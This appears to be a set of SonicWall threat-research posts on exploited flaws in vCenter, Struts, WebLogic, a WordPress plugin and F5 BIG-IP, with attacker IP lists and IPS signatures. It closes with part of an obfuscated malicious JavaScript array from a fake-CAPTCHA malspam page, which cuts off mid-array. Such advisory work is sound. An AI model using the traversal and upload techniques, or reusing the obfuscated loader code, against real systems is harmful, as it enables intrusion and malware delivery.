waf – SonicWall

Critical remote code execution flaw in VMware is being actively exploited

A critical remote code execution vulnerability has been reported in VMware's vSphere/vCenter. The vulnerability is due to improper validation of paths in an uploaded tarball. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation can result in code execution in the context of the target process.

CVE-2021-21972:

vCenter Server is the centralized management utility for VMware and is used to manage virtual machines. The vulnerability is reported in the vRealize Operations (vrop) plugin that comes with the default installation of vCenter. This plugin allows unauthorized file upload and fails to validate the paths provided in the uploaded tarball. An unauthenticated, remote attacker could exploit this vulnerability by uploading a specially crafted file to a vulnerable vCenter Server endpoint that is publicly accessible over port 443. Successful exploitation of this vulnerability would result in an attacker gaining unrestricted RCE privileges on the underlying operating system that hosts vCenter Server.

In most cases, vCenter is available only to users having access to the internal networks. According to Shodan, however, more than 6000 Center servers are exposed online and vulnerable to an attack.

Bad Packets observed mass scanning activity for CVE-2021-21972, searching for vulnerable vCenter servers.

According to Sans Internet Storm Center, attack activity for port 443 has significantly increased over the last few days. Attackers are likely to be scanning for vulnerable vCenter servers.

Fix:

The affected vCenter Server plugin for vROPs is available in all default installations.

Impacted product versions:

7.0 prior to 7.0 U1c
6.7 prior to 6.7 U3l
6.5 prior to 6.5 U3n

Upgrade to one of the patched versions 7.0 U1c or 6.7 U3l or 6.5 U3n. If upgrading is not feasible, follow the KB workarounds KB82374 to disable the vulnerable plugin.

Find VMware security advisory here

SonicWall Capture Labs Threat Research team provides protection against this vulnerability with the following signatures.

IPS: 15403 VMware vCenter Server VMSA-2021-0002 Remote Code Execution (Linux)
IPS: 15404 VMware vCenter Server VMSA-2021-0002 Remote Code Execution (Windows)
IPS: 15406 VMware vCenter Server vropspluginui Access
IPS: 15408 VMware vCenter Server VMSA-2021-0002 Remote Code Execution 3
IPS: 15409 VMware vCenter Server VMSA-2021-0002 Remote Code Execution 4
IPS: 15410 VMware vCenter Server VMSA-2021-0002 Remote Code Execution 5
IPS: 15411 VMware vCenter Server VMSA-2021-0002 Remote Code Execution 6
IPS: 15412 VMware vCenter Server VMSA-2021-0002 Remote Code Execution 7

February 26, 2021/by

intrusions, news, spotlight, waf

CVE-2020-17530: Apache struts vulnerability exploited in the wild

SonicWall Capture Labs Threat Research team has observed hackers actively targeting the recent remote code execution vulnerability in the Apache Struts framework.

This vulnerability is due to insufficient input validation, leading to a forced double OGNL evaluation when evaluating raw user input. A remote attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation will allow an attacker to execute arbitrary code with the privileges of the server.

Apache Struts:

Apache Struts is a modern Java framework that uses the Model, View, Controller (MVC) architecture for building enterprise-ready web applications.

Model - The central component, which manages the data, logic, and rules of the application.

View - Presents information to the user, sometimes allowing multiple views of the same information.

Controller - Accepts input and converts it to commands for the model or view.

Object-Graph Navigation Language (OGNL) is an open-source expression language for Java, which, while using simpler expressions than the full range of those supported by the Java language, allows getting and setting propertiesproperties as well as execution of methods of Java classes.

OGNL uses Java reflection and inspection to address the Object Graph of the runtime application. This allows the program to change behavior based on the state of the object graph instead of relying on compile-time settings. It also allows changes to the object graph.

Due to its ability to create or change executable code, OGNL is capable of introducing critical security flaws to any framework that uses it.

Vulnerability | CVE-2020-17530 :

The OGNL context map is initialized with the mitigating controls that enforce the validations for accessing
packages, classes, and their normally private/ or protected methods/fields. These controls are defined by an instance
of the SecurityMemberAccess class. Similarly, by leveraging introspection via the BeanMap instance, private
properties of the SecurityMemberAccess instance can be accessed and modified. Most importantly excludedClasses and excludedPackageNames containing the set of excluded classes and package names
respectively can be cleared and thus effectively disabling every class and package access restriction.

An attacker is therefore able to completely disable all OGNL expression mitigation controls related to package and
class access. Arbitrary code execution can eventually be realized by invoking suitable methods from previously disallowed classes, for example, Execute.exec() method from “freemarker.template.utility package”.

Exploit:

SonicWall observed the below exploit request in which the BeanMap instance has been leveraged to access and modify the member access and set excludedClasses and excludedPackageNames to empty. One of the disallowed classes "Execute" from the "freemarker.template.utility" package that gives FreeMarker the ability to execute external commands is called to download and execute a malicious file.

Successful exploitation results in the execution of malicious payload "ssa" with the privileges of the server.

Trend Chart:

IPS hits for the signature "14514" in the last 40 days.

SonicWall Capture Labs Threat Research team protects against this exploit with the following signature:

IPS: 14514 Apache Struts OGNL Wildcard Remote Code Execution 8

Problem:

Some of the tag's attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.

Affected Products:

Apache Software Foundation Struts 2.0.0 through 2.5.25

Fix:

Avoid using forced OGNL evaluation on untrusted user input, and/or upgrade to Struts 2.5.26, which checks to ensure that expression evaluation won’t lead to the double evaluation.

IOC (Attacker IP's):

45.146.164.15
67.202.216.194
209.141.33.226
183.57.18.186
167.98.184.6
34.227.121.223
65.124.187.154
107.152.127.190
74.120.44.66
70.98.52.141
144.121.77.34
162.43.198.100
24.173.20.130
192.0.100.121
203.199.72.210
70.102.106.66
34.205.208.125
52.17.98.131
64.19.77.134
205.250.171.58
207.99.76.20
208.105.178.30
64.39.99.230
184.71.110.118
64.39.99.197
64.39.99.246
54.88.149.100
69.193.159.2
204.141.21.156
61.160.215.21
50.239.218.222
71.164.82.98
64.141.27.66
68.118.118.226
128.177.30.162
107.130.178.41
209.141.61.233
64.39.111.60
138.197.142.180
62.8.108.89
64.139.53.114
38.140.141.210
10.100.6.180
24.103.47.50
91.216.32.25
216.235.247.146
50.202.87.195
196.46.54.18
64.39.99.70
64.39.99.13
64.39.99.74
172.30.131.7
64.39.108.132
64.39.99.58
216.171.185.30
64.39.99.69
64.39.99.213
192.168.21.220
64.39.99.252
64.39.99.65
64.39.99.251
198.46.104.42
64.39.108.51
209.53.168.82
64.39.99.61
64.39.99.93
154.59.121.145
207.207.37.172
64.39.99.247
50.235.254.58
64.39.99.233
74.62.85.138
64.39.99.226
187.44.110.185
64.39.99.243
64.39.108.47
64.39.99.210
204.186.244.226
64.39.99.94
23.30.178.61
64.39.108.38
203.71.63.9
64.39.99.92
154.59.121.144
81.82.218.18
96.66.66.65
64.39.99.112
64.39.99.17
64.39.99.235
64.39.99.52
167.98.182.132
64.39.99.64
64.39.99.231
64.39.108.129
192.248.233.26
91.216.32.24
172.31.48.102
118.163.176.200
204.14.69.210
161.11.129.109

December 23, 2020/by

intrusions, news, spotlight, waf

CVE-2020-14882 Oracle WebLogic Remote Code Execution Vulnerability Exploited in the Wild

SonicWall Capture Labs Threat Research team has observed that the recent remote code execution vulnerability reported in Oracle WebLogic Server being exploited in the wild. This vulnerability is due to improper sanitization of user-supplied data via HTTP.

Oracle WebLogic is one of the widely used Java application servers. It helps building and deploying distributed web applications for large enterprise web applications.

Vulnerability | CVE-2020-14882

A remote code execution vulnerability exist in Oracle WebLogic Server. The vulnerability is due to
improper validation of user supplied data in com.bea.console.utils.MBeanUtilsInitSingleFileServlet and
com.bea.console.handles.HandleFactory class.

The vulnerable class com.bea.console.handles.HandleFactory can be triggered using a HTTP request with the following structure:

http://<target>/console/console.portal?_nfpb=true&_pageLabel=HomePage1&handle=<class_name>

MBeanUtilsInitSingleFileServlet does not implement a proper mechanism to filter out the directory traversal
characters ".." nor does it check if the user is authenticated. As a consequence, an attacker can
access "/console/css/%252E%252E%252Fconsole.portal" where "%252E" is double url encoded value of ".."
to bypass the authentication and provide a request parameter containing the word "handle" where the
parameter value is the name of a Class that may be used maliciously and will be instantiated by the
com.bea.console.handles.HandleFactory class.

This exploit allows an unauthenticated attacker to achieve remote code execution on a vulnerable Oracle WebLogic Server by sending a crafted HTTP GET request. Successful exploitation results in the execution of arbitrary code under the security context of the user running WebLogic Server.

Exploit Requests

The following exploits are currently being used:

http://x.x.x.x:7001

Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 14003 Oracle WebLogic Server Remote Command Execution 3
IPS: 15218 Oracle WebLogic Server Remote Command Execution 2

November 25, 2020/by

intrusions, spotlight, waf

CVE-2020–25213: WordPress plugin wp-file-manager actively being exploited in the wild

WordPress is a free and open-source content management system written in PHP. WordPress is used by more than 60 million websites. 38% of the web is built on WordPress. Its plugin architecture allows users to extend the features and functionality to tailor the websites to their specific needs.

Vulnerability | CVE-2020-25213:

An improper access control vulnerability has been reported in the File Manager plugin for WordPress. The vulnerability is due to improper access control of connector.minimal.php file while uploading files. An unauthenticated remote attacker can exploit this vulnerability by uploading a file on the target system. A successful attack could result in code execution in the security context of the target WordPress server.

The vulnerable program is connector.minimal.php in wp-content/plugins/wp-file-manager/lib/php/. This vulnerability is due to the fact that the file connector.minimal.php can be accessed by an unauthenticated attacker. connector.minimal.php file loads elFinderConnector.class.php which is capable of reading HTTP request parameters and facilitating the execution of File Manager features such as file upload. connnector.minimal.php does not implement any authorization mechanisms such as checking the privileges of the user making the request. As a result, an unauthenticated attacker can upload arbitrary files to the server, such as a malicious PHP file, potentially leading to the execution of arbitrary code.

Exploit:

In the above exploit request, the php file "test_php_info.php" can be replaced with any arbitrary file we want to upload on the server. Other than "upload" command, "mkfile and "put" commands available in elFinder could be used to write a PHP file into the file directory and later perform arbitrary remote code execution.

Trend Chart:

Patch:
The below products are affected by this vulnerability.
• File Manager Pro File Manager Plugin for WordPress 6.0 to 6.8
• File Manager Pro File Manager Pro Plugin for WordPress 7.6 to 7.8

The File Manager plugin patched the issue by removing the "lib/php/connector.minimal.php" file from the plugin. Manually removing this file should also prevent attackers from exploiting this vulnerability.

Refer vendor advisory here

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 15205 WordPress wp-file-manager Plugin Remote Code Execution

Indicators of compromise:
13.85.84.182
176.113.115.89
193.27.229.26
13.82.220.36
20.185.0.202
18.207.254.243
51.11.136.167
52.186.156.31
34.226.244.53
18.207.224.249
37.59.35.206
160.20.147.136
161.35.90.11
13.66.185.182
104.248.238.198

October 30, 2020/by

intrusions, IoT, news, spotlight, waf

CVE-2020-5902: Hackers actively exploit critical Vulnerability in F5 BIG-IP

BIG-IP

F5's BIG-IP is a product family comprises software, hardware, and virtual appliances designed around application availability, access control, and security solutions. BIG-IP software products run on top of F5's Traffic Management Operation System® (TMOS), designed specifically to inspect network and application traffic and make real-time decisions based on the configurations given. BIG-IP Configuration Utility is a Web GUI for F5 users to set up the BIG-IP product and to make additional changes.

Vulnerability | CVE-2020-5902

BIG-IP Web GUI is accessible over HTTPS on port 443/TCP via the following URL: https://<BIG-IP server>/tmui/login.jsp

A directory traversal vulnerability exists in the F5 BIG-IP product family. This is due to insufficient validation of the URI within the HTTP requests. By using a semicolon in URI, a remote attacker can bypass the access control policy set up on Apache and forward the malicious URI to the Tomcat backend server. When Tomcat normalizes the URI, any string followed by a semicolon will be ignored. The root cause of the vulnerability is how Apache and Tomcat parse the URL differently, allowing users to bypass the authentication and invoke JSP modules. Successful exploitation allows unauthenticated remote attackers to access the internal java binaries on the vulnerable server.

The following internal JSP files are wildly used to compromise:

/tmui/tmui/locallb/workspace/tmshCmd.jsp
/tmui/tmui/locallb/workspace/fileRead.jsp
/tmui/tmui/locallb/workspace/fileWrite.jsp

Exploit:

We observe the below http exploit requests targeting F5 BIG-IP servers vulnerable to CVE-2020-5902.

Impact:

A quick search on Shodan reveals more than 6000 BIG-IP servers exposed publicly over the internet. Over 2000 of those servers seem vulnerable to CVE-2020-5902.

Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 15070 F5 BIG-IP TMUI Remote Command Execution

Affected Products:

BIG-IP versions 11.6.1 - 11.6.5, 12.1.0 - 12.1.5, 13.1.0 - 13.1.3, 14.1.0 - 14.1.2, 15.1.0 and 15.0.0 - 15.0.1 are affected by this vulnerability.

Find vendor advisory here

IOC:

Attacker IP's:

195.54.160.115
207.180.201.51
222.172.157.32
172.31.48.102
222.172.229.58
182.245.198.246
172.105.149.194
27.115.124.75
27.115.124.10
111.206.250.198
27.115.124.74
182.245.199.208
111.206.250.235
111.206.250.230
64.39.99.67
157.43.37.216
49.206.2.81
111.206.250.236
111.206.250.229
115.236.45.236
115.238.89.37
111.206.250.197
27.115.124.9
180.169.87.53
61.166.216.165

July 31, 2020/by

infostealer, malware, news, spam, spotlight, waf

Massive malspam campaign delivers malicious payloads using fake CAPTHA

SonicWall Capture Labs Threat Research team has come across a new malspam campaign, that pretends to be a legitimate pdf but installs malware on the victim's computer. When a user opens this PDF, they will be shown a prompt that pretends to be a captcha asking the user to confirm they are human. But this is not a real Google reCAPTCHA, a fake image, clicking on it, take the user to a malicious web page.

The malspam targets users who use the browser to open the PDF. When the user clicks the CAPTCHA image from Adobe reader, the user gets a warning (see below) that the PDF is trying to connect to the internet. However, when the user launches the pdf in a browser, clicking on the CAPTCHA takes the user to the malicious web page without any prompt/warning.

The below malicious web page runs javascript on the client-side before redirecting the user to the payload delivery page. The name of the payload "new+toeic+reading+test" is appended to the URL.

This Javascript is heavily obfuscated with anti-debugging techniques to protect the script from the analysis. By having the instruction "debugger;" inside the code, it stops the execution of the script when the debugger hits that instruction. It also implements bot detection techniques ( botFound = 0x1; ) to avoid being detected by good bots like Google safe browsing. The script is obfuscated using options String Array Rotation and RC4 encryption.

<!DOCTYPE html>
<html>
<head>
<title></title>
<script type="text/javascript">
{
var _0x5b05 = ['\x77\x71\x50\x44\x69\x69\x56\x56\x63\x73\x4b\x6b\x50\x73\x4b\x53', '\x45\x63\x4b\x66\x48\x67\x30\x65', '\x58\x4d\x4f\x65\x77\x37\x6e\x43\x74\x38\x4f\x35\x77\x37\x54\x43\x74\x67\x3d\x3d', '\x77\x6f\x58\x44\x69\x47\x76\x44\x6a\x69\x49\x3d', '\x77\x71\x7a\x44\x75\x55\x2f\x44\x74\x79\x38\x3d', '\x77\x70\x4d\x62\x77\x6f\x4e\x50\x77\x6f\x30\x3d', '\x77\x70\x56\x41\x45\x73\x4b\x59\x77\x70\x77\x3d', '\x77\x35\x52\x35\x77\x37\x58\x43\x76\x53\x49\x3d', '\x43\x4d\x4b\x49\x77\x36\x74\x69\x77\x6f\x4e\x46\x77\x72\x4c\x43\x6d\x6b\x59\x3d', '\x77\x34\x54\x43\x6b\x73\x4f\x41\x56\x38\x4b\x6e', '\x51\x4d\x4f\x6c\x77\x35\x7a\x43\x74\x38\x4f\x66', '\x65\x38\x4b\x6c\x77\x35\x62\x43\x73\x6d\x2f\x44\x75\x4d\x4b\x45', '\x50\x32\x76\x43\x73\x38\x4f\x67\x47\x67\x3d\x3d', '\x77\x34\x37\x43\x75\x63\x4b\x48\x44\x6d\x38\x3d', '\x77\x37\x34\x73\x54\x47\x49\x3d', '\x61\x67\x5a\x4f\x77\x37\x5a\x35', '\x77\x70\x4c\x44\x6c\x32\x62\x43\x6d\x42\x52\x4d\x77\x36\x48\x44\x6c\x58\x63\x3d', '\x77\x72\x4c\x44\x71\x7a\x46\x32\x51\x51\x3d\x3d', '\x77\x72\x4e\x71\x45\x4d\x4f\x49\x59\x67\x3d\x3d', '\x46\x47\x33\x43\x70\x4d\x4f\x5a\x4c\x51\x3d\x3d', '\x77\x72\x58\x43\x69\x4d\x4b\x50\x77\x6f\x64\x30\x5a\x41\x62\x44\x72\x67\x3d\x3d', '\x4d\x4d\x4b\x7a\x43\x68\x55\x69\x41\x63\x4f\x33\x77\x34\x4c\x43\x6e\x79\x73\x4d', '\x77\x34\x39\x32\x77\x36\x37\x44\x74\x77\x34\x3d', '\x77\x70\x44\x44\x6b\x67\x56\x34\x63\x41\x3d\x3d', '\x52\x6e\x46\x53\x4f\x4d\x4b\x72\x4d\x4d\x4b\x73\x77\x37\x55\x3d', '\x56\x58\x6f\x6e\x77\x37\x54\x44\x74\x41\x3d\x3d', '\x77\x70\x4a\x38\x62\x63\x4b\x51\x77\x6f\x59\x3d', '\x45\x73\x4f\x51\x77\x70\x31\x55\x42\x67\x3d\x3d', '\x53\x63\x4f\x70\x77\x35\x72\x44\x6e\x69\x6b\x3d', '\x77\x37\x48\x43\x72\x63\x4b\x63\x42\x48\x6b\x3d', '\x77\x70\x70\x47\x58\x52\x4c\x44\x73\x67\x3d\x3d', '\x77\x71\x4a\x32\x48\x63\x4f\x56\x58\x67\x3d\x3d', '\x77\x36\x66\x43\x71\x38\x4f\x50\x49\x63\x4b\x37', '\x77\x72\x66\x43\x76\x63\x4f\x73\x77\x70\x70\x77', '\x4e\x38\x4f\x55\x59\x73\x4b\x67\x77\x70\x6f\x3d', '\x77\x72\x63\x67\x77\x71\x4e\x74\x77\x71\x77\x3d', '\x50\x42\x62\x44\x6c\x38\x4b\x66\x77\x37\x63\x3d', '\x47\x38\x4b\x56\x77\x36\x6c\x6d\x77\x6f\x56\x64\x77\x71\x34\x3d', '\x77\x6f\x35\x2b\x4e\x4d\x4b\x4b\x77\x72\x49\x3d', '\x66\x30\x78\x46\x4f\x73\x4b\x47', '\x4d\x73\x4b\x4e\x77\x37\x4e\x4d\x77\x6f\x45\x3d', '\x77\x35\x4c\x44\x6d\x73\x4f\x7a\x47\x7a\x34\x3d', '\x48\x4d\x4b\x6b\x45\x69\x73\x66', '\x77\x71\x42\x35\x65\x4d\x4b\x61\x77\x72\x77\x3d', '\x77\x72\x54\x44\x69\x68\x74\x52\x61\x63\x4b\x68\x4e\x51\x3d\x3d', '\x77\x70\x56\x6d\x52\x52\x50\x44\x69\x51\x3d\x3d', '\x65\x73\x4b\x7a\x77\x34\x66\x43\x6a\x58\x45\x3d', '\x77\x36\x51\x6b\x50\x73\x4b\x45\x57\x51\x3d\x3d', '\x4b\x38\x4b\x52\x42\x7a\x51\x6d\x77\x71\x54\x44\x72\x43\x38\x3d', '\x77\x34\x4e\x75\x77\x36\x7a\x43\x75\x41\x59\x3d', '\x77\x36\x48\x43\x75\x63\x4f\x4d\x4a\x63\x4b\x6a\x53\x4d\x4f\x34\x64\x41\x3d\x3d', '\x46\x78\x31\x78\x77\x37\x4a\x67\x77\x37\x50\x43\x70\x63\x4f\x68', '\x66\x58\x74\x76\x77\x37\x7a\x44\x6c\x55\x59\x39\x4e\x63\x4b\x38', '\x77\x6f\x78\x4b\x50\x38\x4f\x55\x58\x51\x3d\x3d', '\x51\x47\x4e\x75\x77\x37\x2f\x44\x6c\x41\x3d\x3d', '\x4e\x78\x42\x53\x77\x34\x4a\x52', '\x77\x6f\x45\x2b\x77\x72\x6c\x67\x77\x71\x59\x3d', '\x77\x34\x44\x44\x67\x4d\x4f\x4a\x41\x78\x77\x3d', '\x4d\x73\x4f\x69\x77\x36\x70\x66\x77\x72\x38\x3d', '\x56\x38\x4b\x46\x77\x36\x50\x43\x71\x56\x67\x3d', '\x77\x71\x2f\x43\x69\x63\x4f\x63\x77\x70\x5a\x6e', '\x77\x35\x76\x43\x6c\x4d\x4b\x41\x58\x68\x68\x44\x48\x73\x4b\x35\x53\x41\x3d\x3d', '\x4e\x33\x58\x43\x71\x73\x4f\x34', '\x4e\x63\x4f\x56\x64\x38\x4b\x72\x77\x72\x50\x43\x68\x67\x3d\x3d', '\x77\x72\x67\x66\x77\x72\x70\x5a\x77\x6f\x34\x3d', '\x77\x35\x37\x44\x72\x38\x4f\x72\x59\x44\x67\x3d', '\x77\x70\x66\x44\x76\x38\x4f\x6d\x46\x77\x3d\x3d', '\x77\x34\x76\x44\x71\x38\x4f\x47', '\x77\x36\x38\x6b\x41\x54\x52\x6d', '\x77\x36\x73\x6b\x47\x53\x52\x62', '\x77\x72\x44\x44\x68\x63\x4f\x6f\x4b\x38\x4f\x4c', '\x77\x36\x45\x37\x44\x45\x4c\x43\x72\x4d\x4b\x42\x77\x35\x50\x43\x6a\x38\x4b\x6a', '\x77\x34\x72\x43\x74\x63\x4f\x41\x56\x77\x3d\x3d', '\x53\x73\x4f\x43\x77\x35\x54\x44\x6b\x77\x77\x3d', '\x4c\x6d\x4c\x43\x74\x4d\x4f\x4c\x4a\x51\x3d\x3d', '\x77\x71\x58\x43\x69\x4d\x4b\x2f\x77\x6f\x5a\x72\x61\x41\x62\x44\x76\x51\x3d\x3d', '\x47\x38\x4f\x69\x41\x6a\x34\x59', '\x77\x35\x70\x4f\x77\x37\x54\x44\x72\x77\x34\x3d', '\x42\x77\x44\x44\x70\x38\x4b\x74\x77\x34\x6a\x44\x6b\x31\x4d\x76\x77\x6f\x73\x3d', '\x77\x34\x73\x2f\x42\x52\x35\x63\x77\x36\x49\x6f\x77\x71\x51\x55\x62\x38\x4f\x6a\x4d\x73\x4b\x54\x51\x32\x50\x44\x6e\x43\x4a\x66\x77\x35\x68\x78', '\x64\x43\x52\x4a\x77\x36\x39\x55\x77\x6f\x31\x4f\x77\x35\x33\x44\x6e\x77\x3d\x3d', '\x4f\x78\x58\x44\x6a\x63\x4b\x38\x77\x72\x73\x3d', '\x52\x58\x52\x2f\x4e\x41\x3d\x3d', '\x4b\x58\x58\x43\x6b\x73\x4f\x62\x44\x51\x3d\x3d', '\x64\x33\x34\x7a\x77\x35\x72\x44\x69\x67\x3d\x3d', '\x62\x6d\x68\x73\x77\x36\x54\x44\x71\x6c\x6f\x6c\x4b\x38\x4b\x74\x77\x6f\x6e\x44\x70\x51\x3d\x3d', '\x49\x4d\x4b\x4e\x4e\x78\x55\x58', '\x77\x36\x5a\x4d\x77\x35\x48\x44\x6a\x77\x59\x3d', '\x41\x47\x41\x43\x52\x79\x6a\x43\x72\x73\x4f\x6e', '\x45\x41\x42\x42', '\x77\x34\x38\x4a\x4f\x73\x4b\x54\x58\x41\x3d\x3d', '\x77\x71\x6a\x44\x68\x38\x4f\x37\x54\x69\x55\x3d', '\x4f\x73\x4b\x75\x4c\x54\x77\x7a', '\x44\x38\x4f\x31\x77\x37\x52\x69\x77\x70\x6f\x3d', '\x77\x72\x62\x44\x69\x63\x4b\x65\x57\x41\x3d\x3d', '\x62\x43\x52\x44\x77\x37\x30\x3d', '\x50\x31\x6c\x2b\x77\x71\x30\x79\x77\x72\x44\x44\x6f\x38\x4b\x35\x77\x71\x30\x72\x77\x34\x6a\x44\x6e\x7a\x64\x30\x77\x36\x39\x66\x48\x38\x4f\x39\x77\x72\x48\x44\x6d\x33\x51\x49\x4c\x38\x4b\x74\x77\x6f\x4a\x33\x4f\x51\x64\x32\x77\x36\x6a\x43\x74\x73\x4b\x45\x57\x6b\x38\x3d', '\x77\x34\x52\x62\x77\x37\x37\x44\x6f\x54\x54\x43\x70\x63\x4b\x68\x77\x6f\x30\x3d', '\x58\x33\x59\x37\x77\x36\x44\x44\x71\x51\x3d\x3d', '\x77\x6f\x5a\x51\x5a\x73\x4b\x61\x77\x72\x38\x3d', '\x65\x4d\x4b\x38\x63\x57\x34\x70', '\x47\x38\x4f\x58\x46\x51\x59\x78', '\x77\x71\x66\x44\x6c\x38\x4f\x78\x46\x63\x4f\x53', '\x77\x70\x6c\x58\x77\x37\x6e\x44\x71\x43\x56\x4d\x57\x33\x6e\x44\x76\x77\x3d\x3d', '\x77\x35\x37\x43\x6c\x63\x4b\x4b\x57\x44\x5a\x51\x41\x73\x4b\x6e\x57\x51\x3d\x3d', '\x77\x37\x76\x43\x75\x38\x4f\x57\x4b\x38\x4b\x2f', '\x77\x72\x56\x45\x4e\x38\x4b\x65\x77\x6f\x49\x3d', '\x77\x36\x6e\x43\x76\x63\x4b\x68\x56\x54\x34\x3d', '\x77\x6f\x6c\x54\x58\x52\x4c\x44\x71\x6e\x58\x44\x75\x51\x3d\x3d', '\x77\x72\x2f\x43\x74\x38\x4f\x76\x77\x6f\x78\x4d', '\x77\x35\x59\x48\x42\x44\x64\x4a', '\x44\x42\x48\x44\x76\x38\x4b\x66\x77\x6f\x33\x44\x6b\x4d\x4f\x76\x52\x67\x3d\x3d', '\x77\x36\x48\x43\x73\x4d\x4b\x59\x4b\x45\x66\x44\x6b\x38\x4f\x7a\x61\x51\x3d\x3d', '\x65\x57\x5a\x54\x77\x37\x7a\x44\x69\x46\x73\x71\x49\x67\x3d\x3d', '\x77\x72\x72\x44\x6f\x73\x4b\x52\x63\x4d\x4b\x6c', '\x77\x6f\x4a\x65\x53\x77\x66\x44\x6d\x51\x3d\x3d', '\x5a\x79\x42\x4f\x77\x37\x78\x71', '\x59\x73\x4b\x38\x77\x36\x44\x43\x6a\x48\x51\x3d', '\x77\x37\x2f\x44\x71\x4d\x4f\x36\x41\x51\x55\x3d', '\x77\x35\x70\x52\x77\x36\x33\x44\x72\x43\x48\x43\x72\x38\x4b\x72', '\x52\x55\x68\x39\x4b\x73\x4b\x5a', '\x65\x38\x4b\x6c\x77\x35\x2f\x43\x72\x33\x7a\x44\x73\x77\x3d\x3d', '\x77\x70\x78\x58\x77\x36\x2f\x44\x75\x53\x56\x4c\x44\x54\x50\x43\x72\x38\x4b\x61\x77\x6f\x4c\x43\x75\x42\x6e\x44\x68\x46\x58\x44\x67\x38\x4b\x41\x48\x53\x66\x43\x69\x38\x4b\x4f', '\x62\x45\x70\x58\x77\x34\x4c\x44\x76\x67\x3d\x3d', '\x77\x35\x49\x57\x66\x30\x77\x57', '\x77\x34\x72\x43\x70\x73\x4f\x33\x4d\x4d\x4b\x2f\x56\x63\x4f\x35\x66\x67\x3d\x3d', '\x77\x6f\x39\x5a\x66\x67\x72\x44\x75\x58\x2f\x44\x73\x73\x4b\x44', '\x77\x35\x70\x34\x77\x34\x6e\x43\x6f\x67\x51\x3d', '\x45\x38\x4b\x4b\x77\x36\x64\x73\x77\x6f\x38\x3d', '\x77\x34\x72\x43\x72\x4d\x4f\x58\x4d\x41\x3d\x3d', '\x47\x63\x4b\x4b\x77\x37\x52\x36\x77\x70\x55\x3d', '\x4a\x38\x4f\x65\x77\x37\x6c\x49\x77\x72\x63\x3d', '\x4c\x38\x4f\x52\x4e\x69\x38\x4c', '\x77\x70\x72\x43\x67\x73\x4f\x2b\x77\x70\x64\x43', '\x77\x6f\x62\x44\x72\x73\x4b\x34\x61\x38\x4b\x79', '\x77\x70\x4c\x44\x70\x43\x66\x43\x6b\x69\x67\x3d', '\x58\x57\x46\x47\x77\x34\x48\x44\x6e\x41\x3d\x3d', '\x43\x42\x70\x78\x77\x36\x70\x31', '\x66\x73\x4f\x6d\x77\x37\x6e\x44\x75\x7a\x4d\x3d', '\x77\x35\x7a\x43\x71\x63
\x4b\x65\x4c\x51\x3d\x3d', '\x48\x4d\x4f\x79\x77\x70\x39\x34\x4d\x31\x62\x43\x72\x31\x34\x3d', '\x77\x6f\x52\x2f\x45\x63\x4f\x72\x61\x41\x3d\x3d', '\x62\x73\x4f\x36\x77\x35\x4c\x44\x68\x51\x6f\x3d', '\x54\x73\x4b\x62\x57\x6b\x77\x76\x77\x36\x34\x44\x77\x72\x63\x6d\x77\x71\x30\x4d\x77\x70\x48\x43\x69\x63\x4f\x30\x77\x6f\x4d\x3d', '\x77\x6f\x51\x6a\x77\x71\x56\x41\x77\x6f\x59\x3d', '\x77\x37\x6f\x4e\x46\x77\x68\x4e', '\x4a\x30\x4d\x33\x52\x42\x67\x3d', '\x55\x33\x68\x69\x4a\x41\x3d\x3d', '\x77\x70\x6a\x44\x74\x58\x66\x44\x6a\x67\x6b\x3d', '\x77\x37\x62\x44\x6d\x4d\x4f\x4c\x46\x54\x67\x3d', '\x55\x79\x46\x62\x77\x35\x62\x43\x6d\x6d\x39\x76\x62\x63\x4f\x35\x77\x34\x33\x44\x6b\x31\x76\x44\x72\x6e\x41\x4c\x77\x35\x4c\x43\x6c\x41\x6a\x44\x76\x47\x34\x75\x77\x6f\x33\x43\x6e\x33\x59\x3d', '\x77\x70\x50\x44\x6e\x4d\x4f\x79\x5a\x67\x77\x70', '\x54\x77\x37\x44\x6f\x4d\x4b\x77\x77\x34\x33\x44\x6c\x56\x63\x75\x77\x34\x51\x3d', '\x77\x36\x45\x72\x55\x30\x38\x75', '\x77\x6f\x37\x44\x69\x6d\x72\x43\x6a\x51\x39\x52\x77\x37\x66\x44\x69\x77\x3d\x3d', '\x42\x4d\x4f\x34\x77\x6f\x39\x74', '\x4e\x63\x4f\x55\x5a\x38\x4b\x78\x77\x71\x6e\x43\x6b\x33\x54\x44\x6d\x53\x73\x3d', '\x59\x30\x59\x56\x77\x35\x54\x44\x71\x41\x3d\x3d', '\x46\x44\x5a\x6b\x77\x35\x4a\x52', '\x77\x35\x62\x43\x6f\x73\x4f\x57\x52\x51\x3d\x3d', '\x77\x70\x7a\x44\x68\x56\x37\x44\x68\x7a\x64\x77\x77\x37\x58\x44\x74\x51\x3d\x3d', '\x77\x6f\x33\x44\x71\x4d\x4f\x7a\x48\x63\x4f\x2b\x55\x4d\x4b\x65', '\x45\x63\x4f\x77\x77\x70\x68\x6f\x42\x67\x3d\x3d', '\x4e\x6e\x7a\x43\x72\x4d\x4f\x50\x43\x51\x3d\x3d', '\x77\x6f\x39\x38\x77\x35\x66\x44\x6d\x52\x77\x3d', '\x77\x70\x6c\x69\x56\x41\x77\x75', '\x42\x63\x4b\x31\x4a\x7a\x51\x59', '\x77\x35\x4c\x43\x71\x4d\x4f\x58\x4d\x4d\x4b\x45\x55\x73\x4f\x7a\x66\x4d\x4f\x78\x77\x35\x64\x47', '\x63\x73\x4b\x6d\x61\x32\x56\x70', '\x77\x6f\x77\x72\x77\x71\x64\x72\x77\x71\x74\x4a', '\x77\x34\x4c\x43\x68\x73\x4b\x4c\x53\x79\x78\x46\x48\x4d\x4b\x79\x54\x77\x3d\x3d', '\x77\x71\x44\x44\x6a\x38\x4b\x6a\x53\x4d\x4b\x77\x55\x78\x70\x4f', '\x77\x72\x6a\x44\x68\x63\x4b\x65\x57\x38\x4b\x32\x55\x67\x3d\x3d', '\x65\x47\x45\x36\x77\x37\x45\x3d', '\x77\x72\x50\x43\x6a\x73\x4b\x43\x77\x70\x59\x3d', '\x45\x38\x4f\x77\x77\x35\x4a\x42\x77\x72\x56\x6c', 